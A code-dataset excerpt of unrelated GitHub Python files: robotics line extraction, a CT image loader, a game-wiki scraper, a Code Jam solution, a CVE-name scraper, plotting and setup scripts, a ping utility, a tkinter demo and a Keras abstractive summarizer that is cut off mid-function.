line_least_square(window)\n x_range = (window[0, 0], window[0, -1])\n plt.plot([x_range[0], x_range[1]], [x_range[0] * line[0] + line[1], x_range[1] * line[0] + line[1]], c=\"b\", linewidth=2)\n i = i+ j\nplt.legend()\nplt.title('Line regression')\nplt.show()\n\nend = time.time()\ntime_reg = end-start\n\n##########################################################################################################################################################\n##################################################################### Hough transform ####################################################################\n##########################################################################################################################################################\n\n\ndef cartesianToPixel(p, range_x, range_y, x_neg, y_neg):\n return [ int( (p[0] - x_neg) * 500 / range_x), int((p[1] - y_neg) * 500 / range_y ) ]\n\nstart = time.time()\n\nx_neg = np.min(points_cartesian[0, :])\ny_neg = np.min(points_cartesian[1, :])\nrange_x = np.max(points_cartesian[0, :]) - np.min(points_cartesian[0, :])\nrange_y = np.max(points_cartesian[1, :]) - np.min(points_cartesian[1, :])\n\n\nimage = np.zeros([800, 800])\nfor i in range(points_cartesian.shape[1]):\n image[ 500 +100 - cartesianToPixel(points_cartesian[:, i], range_x, range_y, x_neg, y_neg)[1], 150 + cartesianToPixel(points_cartesian[:, i], range_x, range_y, x_neg, y_neg)[0] ] = 255\n\ncv2.imwrite(\"tmp.png\", image)\nimage = cv2.imread(\"tmp.png\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nkernel = np.ones((3, 3), np.uint8)\ngray = cv2.dilate(gray, kernel, iterations=1)\nthresold_theta_min = 3 * np.pi /180\n\nlines = cv2.HoughLines(gray,0.5,np.pi/180, 30)\nthetas = []\n\nfor line in lines:\n for rho,theta in line:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n\n if not (sum(abs (np.abs(thetas) - np.abs(theta)) < thresold_theta_min) > 0 ) and len(thetas)> 0 or len(thetas)==0:\n cv2.line(image,(x1,y1),(x2,y2),(0,0,255),2)\n thetas.append(theta)\n\n# cv2.imshow(\"figure\", image)\n# cv2.waitKey()\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nplt.imshow(image)\nplt.legend()\nplt.title('Hough transform')\nplt.show()\n\nend = time.time()\ntime_Hough = end-start\n\n################################################################# Checking the time of executions ######################################################\nfig, ax = plt.subplots()\nind = np.arange(1, 4)\ns, h, r = plt.bar(ind, [time_split, time_Hough, time_reg])\ns.set_facecolor('g')\nh.set_facecolor('b')\nr.set_facecolor('r')\nax.set_xticks(ind)\nax.set_xticklabels(['Split and Merge', 'Hough Transform', 'Line Regression'])\nax.set_ylabel('Seconds')\nax.set_title('Line Extraction Algorithm')\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"samysellami/Intelligent-mobile-robotics","sub_path":"Assignment2/Code_python/Line_extraction.py","file_name":"Line_extraction.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74246390275","text":"import os\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom glob import glob\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass ct_dataset(Dataset):\n def __init__(self, mode, load_mode, train_path, saved_path, test_patient, \n patch_n=None, patch_size=None, transform=None, norm = False, patch_training = False):\n assert mode in ['train', 'test'], \"mode is 'train' or 'test'\"\n assert load_mode in [0,1], \"load_mode is 0 or 1\"\n\n input_path = sorted(glob(os.path.join(saved_path, '*_input*.npy'))) # glob遍历文件夹下所有文件或文件夹;sorted对所有可迭代的对象进行排序操作\n target_path = sorted(glob(os.path.join(saved_path, '*_target*.npy')))\n self.load_mode = load_mode\n self.patch_n = patch_n\n self.patch_size = patch_size\n self.patch_training = patch_training\n self.transform = transform\n self.norm = norm\n self.mode = mode\n\n if mode == 'train':\n # ugly refactoring\n input_path = sorted(glob(os.path.join(train_path, 'data', '*.npy')))\n target_path = sorted(glob(os.path.join(train_path, 'label', '*.npy')))\n input_ = [f for f in input_path]\n target_ = [f for f in target_path]\n if load_mode == 0: # batch data load\n self.input_ = input_\n self.target_ = target_\n else: # all data load\n self.input_ = [np.load(f) for f in input_]\n self.target_ = [np.load(f) for f in target_]\n else: # mode =='test'\n input_ = [f for f in input_path if test_patient in f]\n target_ = [f for f in target_path if test_patient in f]\n if load_mode == 0: # batch data load\n self.input_ = input_\n self.target_ = target_\n else: # all data load\n self.input_ = [np.load(f) for f in input_]\n self.target_ = [np.load(f) for f in target_]\n \n\n def __len__(self):\n return len(self.target_)\n\n def __getitem__(self, idx):\n input_img, target_img = self.input_[idx], self.target_[idx]\n if self.load_mode == 0:\n input_img, target_img = np.load(input_img), np.load(target_img)\n \n # do normalization\n if self.norm:\n input_mean, input_std = np.mean(input_img), np.std(input_img)\n target_mean, target_std = np.mean(target_img), np.std(target_img)\n input_img = (input_img - input_mean) / input_std\n target_img = (target_img - target_mean) / target_std\n\n # if self.mode == 'train' and self.transform:\n # input_img = self.preprocess(input_img)\n # target_img = self.preprocess(target_img)\n\n\n if self.mode == 'train' and self.patch_training:\n input_patches, target_patches = get_patch(input_img,\n target_img,\n self.patch_n,\n self.patch_size)\n return (input_patches, target_patches)\n else:\n return (input_img, target_img)\n\n\ndef get_patch(full_input_img, full_target_img, patch_n, patch_size): # 定义patch\n assert full_input_img.shape == full_target_img.shape\n patch_input_imgs = []\n patch_target_imgs = []\n h, w = full_input_img.shape\n new_h, new_w = patch_size, patch_size\n for _ in range(patch_n):\n top = np.random.randint(0, h-new_h)\n left = np.random.randint(0, w-new_w)\n patch_input_img = full_input_img[top:top+new_h, left:left+new_w]\n patch_target_img = full_target_img[top:top+new_h, left:left+new_w]\n patch_input_imgs.append(patch_input_img)\n patch_target_imgs.append(patch_target_img)\n return np.array(patch_input_imgs), np.array(patch_target_imgs)\n\n\ndef get_loader(mode='train', load_mode=0, train_path = None,\n saved_path=None, test_patient='LDCT',\n patch_n=None, patch_size=None,\n transform=None, batch_size=32, \n num_workers=6, norm = False, patch_training = False):\n train_dataset= ct_dataset('train', load_mode, train_path, saved_path, test_patient, patch_n, patch_size, transform, norm, patch_training)\n train_data_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers) \n\n test_dataset = ct_dataset('test', load_mode, train_path, saved_path, test_patient, patch_n, patch_size, transform, norm, False)\n test_data_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers) \n return train_data_loader, test_data_loader\n","repo_name":"imabackstabber/CT_DIY","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12445165539","text":"import pandas\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup as BS\nimport time\nimport requests\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom ComFunc import *\nmainUrl = 'https://grandislibrary.com'\nclassesUrl = 'https://grandislibrary.com/classes'\n\n\n\n\ndef StartScraping():\n start = time.time()\n CharacterDF, UnionDF, MWeaponDF, SWeaponDF = navigateClasses()\n \n CharacterDF = cleanCharDF(CharacterDF)\n \n UnionDF = cleanUDF(UnionDF)\n\n CharacterDF.to_csv('DefaultData\\\\CharacterData\\\\CharacterData.csv')\n UnionDF.to_csv('DefaultData\\\\CharacterData\\\\UnionData.csv')\n MWeaponDF.to_csv('DefaultData\\\\CharacterData\\\\ClassMainWeapon.csv')\n SWeaponDF.to_csv('DefaultData\\\\CharacterData\\\\ClassSecWeapon.csv')\n\n \n end = time.time()\n print(f'Total time taken: {end-start}')\n return\n\ndef navigateClasses():\n\n browser = webdriver.Chrome(ChromeDriverManager().install())\n\n browser.get(classesUrl)\n\n browser = scrollDown(browser, 10)\n \n lazyLoadDiv = browser.find_elements(By.CLASS_NAME, 'lazyload-wrapper')\n \n ClassesLinks = []\n for a in lazyLoadDiv:\n classChunkList = a.find_elements_by_tag_name('a')\n for link in classChunkList:\n ClassesLinks.append(link.get_attribute('href'))\n \n\n browser.close()\n \n \n request_session = requests.session()\n CharacterDF = pandas.DataFrame()\n UnionDF = pandas.DataFrame()\n ClassMWeaponDF = pandas.DataFrame()\n ClassSWeaponDF = pandas.DataFrame()\n \n ignoreClasses = ['Beast-Tamer', 'Jett']\n for link in ClassesLinks:\n if any(c.lower() in link.lower() for c in ignoreClasses) == True:\n continue\n \n charCollection = retrieveClassPage(link, request_session)\n CharacterDF = CharacterDF.append(charCollection[0], ignore_index=True)\n UnionDF = UnionDF.append(charCollection[1],ignore_index=True)\n ClassMWeaponDF = ClassMWeaponDF.append(charCollection[2], ignore_index=True)\n ClassSWeaponDF = ClassSWeaponDF.append(charCollection[3], ignore_index=True)\n\n \n return CharacterDF, UnionDF, ClassMWeaponDF, ClassSWeaponDF\n\ndef scrollDown(browser, noOfScrollDown):\n \n body = browser.find_element_by_tag_name(\"body\")\n \n while noOfScrollDown >=0:\n body.send_keys(Keys.PAGE_DOWN)\n noOfScrollDown -=1\n \n \n \n return browser\n \ndef retrieveClassPage(subUrl, session):\n start = time.time()\n PageContent = session.get(subUrl)\n \n MainContent = BS(PageContent.content, 'lxml')\n ClassName = MainContent.find('h1').next\n\n ClassDetailsTable = MainContent.find_all('tbody')[0].find_all('tr')\n \n if ClassName.find(\"Fire\") != -1 and ClassName.find('Poison') != -1:\n ClassName = 'Fire Poision'\n elif ClassName.find(\"Ice\") != -1 and ClassName.find('Lightning') != -1:\n ClassName = 'Ice Lightning'\n \n ResistanceGrp = ['Demon', 'Xenon']\n specialMod = [',', '+']\n CS = {}\n CS['ClassName'] = ClassName\n for tr in ClassDetailsTable:\n th = tr.find('th')\n td = tr.find('td')\n if th.get_text().find('Class Group') != -1:\n \n faction = removeN(td.next, '\\n')\n if any(c.lower() in faction.lower() for c in ResistanceGrp) == True:\n faction = 'Resistance'\n elif ClassName == 'Zero':\n faction = 'Transcendant'\n elif ClassName == 'Kinesis':\n faction = 'FriendStory'\n CS['Faction'] = faction\n \n elif th.get_text().find('Job Group') != -1:\n CT = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n CT = 'SPECIAL'\n CS['ClassType'] = CT\n elif th.get_text().find('Primary Stat') != -1:\n stat = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n stat = 'SPECIAL'\n CS['MainStat'] = stat\n elif th.get_text().find('Secondary Stat') != -1:\n stat = td.next\n if any(m in td.get_text() for m in specialMod) == True:\n stat = 'SPECIAL'\n if td.get_text() == \"-\" and CS['ClassName'] == \"Demon Avenger\":\n stat = \"STR\"\n \n CS['SecStat'] = stat\n \n elif th.get_text().find('Legion') != -1:\n UET = 'FLAT'\n UE = removeN(td.contents[0].get_text(), [',', 'and'])\n UES = td.contents[1].get_text()\n UES = removeN(UES, [\"+\",\"(\", \")\"])\n UES = UES.split('/')\n \n if UES[-1].find('%') != -1:\n UET = 'PERC'\n UES[-1] =UES[-1].split('%')[0]\n\n if UE.find('%') != -1:\n UE = UE.split('%')[1]\n if UE.find('(') != -1:\n UE = UE.split('(')[0] \n\n CS['UnionEffect'] = UE\n CS['UnionEffectStat'] = UES\n CS['UnionEffectType'] = UET\n elif th.get_text().find('Weapon') != -1:\n WeaponList = []\n \n if \"PWeap\" in CS:\n for weap in td:\n t = removeN(weap.get_text(), '\\n')\n if ClassName == 'Zero':\n t = 'Heavy Sword'\n WeaponList.append(removeFLSpace(t))\n CS['SWeap'] = WeaponList\n else:\n for weap in td:\n t = removeN(weap.get_text(), '\\n')\n t = t[1:] if t[0] == ' ' else t\n if ClassName == 'Zero':\n t = 'Long Sword'\n WeaponList.append(t)\n CS['PWeap'] = WeaponList \n\n UnionD = {\n 'Effect' : CS['UnionEffect'],\n 'Rank B' : CS['UnionEffectStat'][0],\n 'Rank A' : CS['UnionEffectStat'][1],\n 'Rank S' : CS['UnionEffectStat'][2],\n 'Rank SS' : CS['UnionEffectStat'][3],\n 'Rank SSS' : CS['UnionEffectStat'][4],\n 'EffectType' : CS['UnionEffectType']\n }\n UnionDF = pandas.DataFrame(\n UnionD, index = [0]\n )\n CS.pop('UnionEffectStat')\n \n tempJ = []\n tempW = []\n for w in CS['PWeap']:\n tempJ.append(CS['ClassName'])\n tempW.append(w)\n MWeapon = {\n 'ClassName' : tempJ ,\n 'WeaponType' : tempW\n }\n ClassMWeaponDF = pandas.DataFrame(\n MWeapon \n )\n CS.pop('PWeap')\n tempJ = []\n tempW = []\n for w in CS['SWeap']:\n tempJ.append(CS['ClassName'])\n tempW.append(w)\n SWeapon = {\n 'ClassName' : tempJ ,\n 'WeaponType' : tempW\n }\n ClassSWeaponDF = pandas.DataFrame(\n SWeapon\n )\n \n CS.pop('SWeap')\n \n CharacterDF = pandas.DataFrame(CS, index=[0])\n\n smallCollection = [CharacterDF, UnionDF, ClassMWeaponDF, ClassSWeaponDF]\n \n end = time.time()\n print(f' {ClassName} added in {end-start}') \n \n return smallCollection\n\n\ndef cleanUDF(DF):\n \n DF.drop_duplicates(keep='first', inplace=True)\n DF = DF.reset_index(drop = True)\n \n return DF\n\ndef cleanCharDF(DF):\n \n tempCT = pandas.Series(DF['ClassType']).str.replace(\"Archer\", \"Bowman\")\n DF['ClassType'] = tempCT\n \n return DF\n\nif __name__ == '__main__':\n StartScraping()\n\n","repo_name":"Yongyiphan/WebScrapMSEA","sub_path":"CharacterData.py","file_name":"CharacterData.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587457641","text":"t = int(input()) # read a line with a single integer\nfor ii in range(1, t + 1):\n a_c, a_j = [int(s) for s in input().split(\" \")]\n\n time_c = []\n for c in range(a_c):\n start, end = [int(s) for s in input().split(\" \")]\n time_c.append((start, end, \"a\"))\n\n time_j = []\n for j in range(a_j):\n start, end = [int(s) for s in input().split(\" \")]\n time_j.append((start, end, \"b\"))\n\n time = time_c + time_j\n\n time.sort()\n\n # extend the list\n\n added_time = []\n\n for i in range(len(time) - 1):\n t = time[i]\n t_next = time[i + 1]\n\n t_s, t_e, t_t = t\n n_s, n_e, n_t = t_next\n\n if t_e == n_s:\n continue\n if t_t != n_t:\n new_type = \"ab\"\n elif t_t == \"a\":\n new_type = \"aa\"\n else:\n new_type = \"bb\"\n\n new_time = (t_e, n_s, new_type)\n added_time.append(new_time)\n\n first = time[0]\n last = time[-1]\n\n t_s, t_e, t_t = last\n n_s, n_e, n_t = first\n\n if t_e == n_s:\n continue\n if t_t != n_t:\n new_type = \"ab\"\n elif t_t == \"a\":\n new_type = \"aa\"\n else:\n new_type = \"bb\"\n\n if t_e == 1440:\n if n_s == 0:\n new_time = None\n else:\n new_time = (0, n_s, new_type)\n\n elif n_s == 0:\n new_time = (t_e, 1440, new_type)\n else:\n new_time = (t_e, 1440 + n_s, new_type)\n\n if new_time is not None:\n added_time.append(new_time)\n\n time += added_time\n\n time.sort()\n # print (time)\n\n while True:\n sum_a = 0\n sum_b = 0\n sum_ab = 0\n\n max_aa = None\n max_aa_l = 0\n\n max_bb = None\n max_bb_l = 0\n for i in range(len(time)):\n t = time[i]\n t_s, t_e, t_t = t\n if t_t == \"a\" or t_t == \"aa\":\n if t_t == \"aa\" and t_e - t_s > max_aa_l:\n max_aa = i\n max_aa_l = t_e - t_s\n\n sum_a += t_e - t_s\n\n elif t_t == \"b\" or t_t == \"bb\":\n if t_t == \"bb\" and t_e - t_s > max_bb_l:\n max_bb = i\n max_bb_l = t_e - t_s\n\n sum_b += t_e - t_s\n else:\n sum_ab += t_e - t_s\n\n # print (\"a, b, ab,\", sum_a, sum_b, sum_ab)\n if sum_b + sum_ab >= 720 and sum_a + sum_ab >= 720:\n break\n elif sum_b + sum_ab < 720:\n # print(sum_b, sum_ab)\n # aa -> b\n t_s, t_e, t_t = time[max_aa]\n time[max_aa] = (t_s, t_e, \"b\")\n if t_e - t_s + sum_b + sum_ab >= 720:\n break\n else:\n t_s, t_e, t_t = time[max_bb]\n time[max_bb] = (t_s, t_e, \"a\")\n if t_e - t_s + sum_a + sum_ab >= 720:\n break\n\n count = 0\n\n for i in range(len(time)):\n t_s, t_e, t_t = time[i]\n time[i] = (t_s, t_e, t_t[0])\n\n # print (time)\n for i in range(len(time) - 1): # find number of transitions\n t = time[i]\n t_next = time[i + 1]\n\n t_s, t_e, t_t = t\n n_s, n_e, n_t = t_next\n\n if (t_t != n_t):\n count += 1\n\n first = time[0]\n last = time[-1]\n\n t_s, t_e, t_t = last\n n_s, n_e, n_t = first\n if t_t != n_t:\n count += 1\n\n print(\"Case #{}: {}\".format(ii, count))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/207.py","file_name":"207.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33921079197","text":"#encoding=utf-8\nimport re\nimport json\nimport urllib3\nimport requests\nfrom lxml import etree\nfrom bs4 import BeautifulSoup\n\ndef mitre_pull_cve():\n cveNameList = []\n #去除ssl证书告警\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n url = \"https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Microsoft+Exchange+Server\"\n #url = \"https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Microsoft+Windows+Media+Foundation+Remote+Code+Execution+Vulnerability\"\n headers = {\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'\n }\n r = requests.get(url, verify=False, headers=headers)\n #html = r.content.decode('utf-8')\n html = r.text\n bs = BeautifulSoup(html, \"html.parser\")\n #tags = list(bs.find(id=\"TableWithRules\").table.children)\n div = bs.find('div', {'id':'TableWithRules'})\n tds = div.findAll('td')\n for td in tds:\n try:\n #print(td.a.string)\n cveNameList.append(td.a.string)\n except:\n pass\n return cveNameList","repo_name":"shelly-cn/ExchangeCVESearch","sub_path":"cvePull/pullMitreCVE.py","file_name":"pullMitreCVE.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26044374460","text":"import warnings\nwarnings.filterwarnings( \"ignore\", module = \"matplotlib\\..*\" )\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport general_purpose as gp\n\nif __name__ == '__main__':\n labels = []\n\n df = pd.read_csv(\"./data/translation_error_gicp_vs_lc.csv\")\n print(df)\n df = df.dropna(axis=1, how='all')\n df = gp.transpose_by_iteration(df, columns=[\"GICP + Loop-Closure (x, y, z)\", \"GICP + Loop-Closure (x, y)\", \"GICP\", \"index\"]) \n\n lc_indices = df[\"index\"]\n absolute_error = df[\"GICP + Loop-Closure (x, y, z)\"]\n\n df = df.drop(\"index\", axis=1)\n x = []\n\n cnt = 0\n previous_lc_index = -1\n for i in lc_indices:\n if i == 1:\n # check previous\n if cnt == 0 or absolute_error[cnt] / absolute_error[cnt - 1] < 0.9:\n x.append(cnt)\n cnt += 1\n\n # plot individual plots\n gp.plot_error(df, True, 20)\n #plot_average_iterations(df)\n\n plt.xlabel(\"Pose-Index\")\n plt.ylabel(\"Durschnittliche Distanz [m]\")\n\n plt.vlines(x = x, ymin = -1, ymax = max(df[\"GICP\"]),\n colors = 'red',\n label = 'vline_multiple - full height')\n\n sns.despine()\n plt.show()","repo_name":"pahoffmann/tsdf_loop_closure","sub_path":"scripts/translation_error_gicp_vs_lc.py","file_name":"translation_error_gicp_vs_lc.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9920869475","text":"import setuptools\n\ndef configuration(parent_package='', top_path=None):\n\n from numpy.distutils.misc_util import Configuration\n from numpy.distutils.core import Extension\n\n config = Configuration('geospatialtools', parent_package, top_path)\n\n config.add_extension('terrain_tools_fortran',\n sources=['src/planchon_2001.f90','src/terrain_tools.f90'],\n extra_f90_compile_args = ['-fPIC','-lgomp','-Wall','-pedantic','-fopenmp','-O3']\n ),\n\n config.add_extension('upscaling_tools_fortran',\n sources=['src/upscaling_tools.f90'],\n extra_f90_compile_args = ['-fPIC','-lgomp','-Wall','-pedantic','-fopenmp','-O3']\n ),\n\n config.add_subpackage('',subpackage_path='libraries')\n \n\n return config\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n setup(**configuration(top_path='').todict())\n","repo_name":"chaneyn/geospatialtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"22012519075","text":"import sys\nprint(\"python ver in local machine:\",sys.version)\n\nimport socket\nhostname=socket.gethostname()\nprint(hostname)\n\nipadd = socket.gethostbyname(hostname)\nprint(ipadd)\nprint(\"\\n\")\n\nimport os\nwith open(\"ip_list\") as file:\n park = file.read()\n park = park.splitlines()\n print(\"{park} \\n\")\n\nfor ip in park:\n response = os.popen(f\"ping {ip}\").read()\n if(\"requested timed out.\" or \"unreachable\")in response:\n print(response)\n f = open(\"info_output.txt\",\"a\")\n f.write(str(ip)+ 'link is down'+'\\n')\n f.close()\n else:\n print(response)\n f = open(\"info_output.txt\",\"a\")\n f.write(str(ip)+ 'link is up'+'\\n')\n f.close()\nwith open(\"ip_output.txt\") as file:\n output = file.read()\n f.close()\n print(output)\nwith open(\"info_output.txt\",\"w\")as file:\n pass","repo_name":"Mohana-7373/pythonProject","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70996641793","text":"import tkinter as tk\nfrom tkinter import ttk\n\n\ndef greet():\n print(f\"Hello, {user_name.get() or 'World'}!\")\n\n\nroot = tk.Tk()\n\n# creates a placeholder for a string coming from an entry field\nuser_name = tk.StringVar()\n\n# entry field\nname_label = ttk.Label(root, text=\"Name: \")\nname_label.pack(side=\"left\", padx=(0, 10))\nname_entry = ttk.Entry(root, width=15, textvariable=user_name)\nname_entry.pack(side=\"left\")\nname_entry.focus()\n\ngreet_button = ttk.Button(root, text=\"Greet\", command=greet)\ngreet_button.pack(side=\"left\")\n\nquit_button = ttk.Button(root, text=\"Quit\", command=root.destroy)\nquit_button.pack(side=\"right\")\n\nroot.mainloop()\n\n# destroy quits the root window\n\n# working with entry fields and stringvars\n","repo_name":"cmulliss/gui_python","sub_path":"widgets/greet.py","file_name":"greet.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71174894273","text":"import pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Model, load_model as keras_load_model\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport tensorflow.keras.backend as K\n\nimport nodetails.prep\nimport nodetails.util\nfrom nodetails._types import *\nfrom nodetails import is_debug\nfrom nodetails.extern.attention import Attention\n\n\ndef create_models(lexicon: Lexicon, latent_dim=500) -> AbstractiveModel:\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n encoder_vocab = len(x_tkn.word_index) + 1\n decoder_vocab = len(y_tkn.word_index) + 1\n \n K.clear_session()\n encoder_input = layers.Input(shape=(x_len,))\n embedded1 = layers.Embedding(encoder_vocab, latent_dim, trainable=True, input_shape=(x_len,))(encoder_input)\n\n hidden_layer1 = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n hidden1, _, _ = hidden_layer1(embedded1)\n\n hidden_layer2 = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n hidden2, _, _ = hidden_layer2(hidden1)\n\n hidden_layer3 = layers.LSTM(latent_dim, return_state=True, return_sequences=True)\n encoder_output, state_h, state_c = hidden_layer3(hidden2)\n encoder_state = [state_h, state_c]\n\n decoder_input = layers.Input(shape=(None,))\n decoder_embedding = layers.Embedding(decoder_vocab, latent_dim, trainable=True)\n embedded2 = decoder_embedding(decoder_input)\n\n decoder_lstm = layers.LSTM(latent_dim, return_sequences=True, return_state=True)\n decoder_output, _, _ = decoder_lstm(embedded2, initial_state=encoder_state)\n\n attention = Attention()\n hidden4, _ = attention([encoder_output, decoder_output])\n\n hidden5 = layers.Concatenate(axis=-1)([decoder_output, hidden4])\n\n decoder_dense = layers.TimeDistributed(\n layers.Dense(decoder_vocab, activation=\"softmax\"))\n output = decoder_dense(hidden5)\n\n training_model = Model(name=\"training_model\",\n inputs=[encoder_input, decoder_input],\n outputs=output)\n\n infr_encoder_model = Model(name=\"encoder_infrerence_model\",\n inputs=encoder_input,\n outputs=[encoder_output, state_h, state_c])\n\n infr_prev_h = layers.Input(shape=(latent_dim,))\n infr_prev_c = layers.Input(shape=(latent_dim,))\n infr_prev_hidden = layers.Input(shape=(x_len, latent_dim))\n infr_embedded = decoder_embedding(decoder_input)\n\n infr_hidden1, infr_state_h, infr_state_c = decoder_lstm(\n infr_embedded, initial_state=[infr_prev_h, infr_prev_c])\n infr_hidden2, _ = attention([infr_prev_hidden, infr_hidden1])\n infr_hidden3 = layers.Concatenate(axis=-1)([infr_hidden1, infr_hidden2])\n\n infr_output = decoder_dense(infr_hidden3)\n infr_decoder_model = Model(name=\"decoder_infrerence_model\",\n inputs=[decoder_input] + [infr_prev_hidden, infr_prev_h, infr_prev_c],\n outputs=[infr_output] + [infr_state_h, infr_state_c])\n\n return AbstractiveModel(training_model,\n infr_encoder_model, infr_decoder_model, lexicon)\n\n\ndef train_model(abs_model: AbstractiveModel, training_set: TrainingSet,\n batch_size=64, show_graph=False):\n x_train, y_train, x_val, y_val, = training_set\n model = abs_model.training\n\n model.compile(optimizer=\"rmsprop\", loss=\"sparse_categorical_crossentropy\")\n early_stopping = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=is_debug())\n\n history = model.fit([x_train, y_train[:, :-1]],\n y_train.reshape(y_train.shape[0], y_train.shape[1], 1)[:, 1:],\n epochs=50, callbacks=[early_stopping], batch_size=batch_size,\n validation_data=([x_val, y_val[:, :-1]],\n y_val.reshape(y_val.shape[0], y_val.shape[1], 1)[:, 1:]))\n\n if show_graph:\n plt.figure()\n plt.plot(history.history[\"loss\"], label=\"train\")\n plt.plot(history.history[\"val_loss\"], label=\"test\")\n plt.legend()\n plt.show(block=True)\n\n return model\n\n\ndef save_model(abs_model: AbstractiveModel, save_location):\n _, encoder_model, decoder_model, lexicon = abs_model\n if is_debug():\n print(f\"Saving model at {save_location}\")\n\n encoder_model.save(f\"{save_location}/encoder.h5\")\n decoder_model.save(f\"{save_location}/decoder.h5\")\n if is_debug():\n print(f\"Encoder and decoder is saved.\")\n\n params = lexicon\n\n with open(f\"{save_location}/parameters.pkl\", \"wb\") as fp:\n pickle.dump(params, fp)\n if is_debug():\n print(f\"Model saved\")\n\n\ndef load_model(save_location) -> AbstractiveModel:\n if is_debug():\n print(f\"Loading model from {save_location}\")\n\n encoder_model = keras_load_model(f\"{save_location}/encoder.h5\",\n custom_objects={\"Attention\": Attention},\n compile=False)\n decoder_model = keras_load_model(f\"{save_location}/decoder.h5\",\n custom_objects={\"Attention\": Attention},\n compile=False)\n if is_debug():\n print(f\"Encoder and decoder is loaded.\")\n\n with open(f\"{save_location}/parameters.pkl\", \"rb\") as fp:\n lexicon = pickle.load(fp)\n if is_debug():\n print(f\"Model loaded\")\n\n return AbstractiveModel(None, encoder_model, decoder_model, lexicon)\n\n\ndef decode_sequence(input_seq, abs_model: AbstractiveModel):\n _, encoder_model, decoder_model, (_, y_tkn, _, y_len) = abs_model\n\n encoder_output, state_h, state_c = encoder_model.predict(input_seq)\n encoder_state = [state_h, state_c]\n\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = y_tkn.word_index[\"\"]\n\n _done = False\n result = []\n while not _done:\n output, state_h, state_c = decoder_model.predict(\n [target_seq, encoder_output] + encoder_state)\n\n sampled_index = np.argmax(output[0, -1, :])\n if sampled_index == 0:\n _done = True\n else:\n sampled_token = y_tkn.index_word[sampled_index]\n # print(\"sampled_token\", sampled_token)\n if sampled_token != \"\":\n result.append(sampled_token)\n\n if sampled_token == \"\" or len(result) >= y_len - 1:\n _done = True\n else:\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = sampled_index\n encoder_state = [state_h, state_c]\n\n return \" \".join(result)\n\n\ndef seq2text(input_seq, tkn: keras.preprocessing.text.Tokenizer):\n result = [tkn.index_word[it] for it in input_seq if it != 0]\n return \" \".join(result)\n\n\ndef test_validation_set(abs_model: AbstractiveModel, x_val, y_val, lexicon, item_range=(0, 1)):\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n def decode_validation_seq(it):\n result = decode_sequence(it.reshape(1, x_len), abs_model)\n assert result, f\"Empty result of type {type(result)} at item #{it}\"\n return result\n\n for i in range(*item_range):\n review = seq2text(x_val[i], x_tkn)\n sum_orig = (seq2text(y_val[i], y_tkn).replace(\"\", \"\")\n .replace(\"\", \"\")\n .strip())\n sum_pred = decode_validation_seq(x_val[i])\n print(\"\\nReview #%s: %s\" % (i, review))\n print(\"Original summary:\", sum_orig)\n print(\"Predicted summary:\", sum_pred)\n\n\ndef make_inference(abs_model: AbstractiveModel, query: str):\n (_, encoder_model, decoder_model,\n (x_tkn, y_tkn, x_len, y_len)) = abs_model\n\n def 